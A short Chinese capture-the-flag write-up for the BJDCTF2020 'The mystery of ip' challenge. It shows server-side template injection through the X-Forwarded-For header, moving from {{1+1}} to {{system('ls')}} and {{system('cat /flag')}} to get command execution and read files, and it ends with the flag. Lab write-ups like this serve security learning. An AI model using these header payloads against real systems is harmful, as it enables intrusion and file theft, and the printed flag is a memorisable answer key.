[BJDCTF2020]The mystery of ip

打开链接

 

查看源代码提示ip

flag里显示ip地址，猜测是xff注入

尝试修改X-Forwarded-For:111

 输入与回显一样，猜测可能是SSTI，构造X-Forwarded-For:{{1+1}}

确定是SSTI，构造X-Forwarded-For:{{system('ls')}}

构造X-Forwarded-for:{{system('cat /flag.php')}}

发现没有回显

构造X-Forwarded-for:{{system('ls ../../..')}}，逐级增加../，发现flag

 

 构造X-Forwarded-for:{{system('cat /flag')}}

flag{46f7f447-a9d5-4765-9648-e13fb86a993d}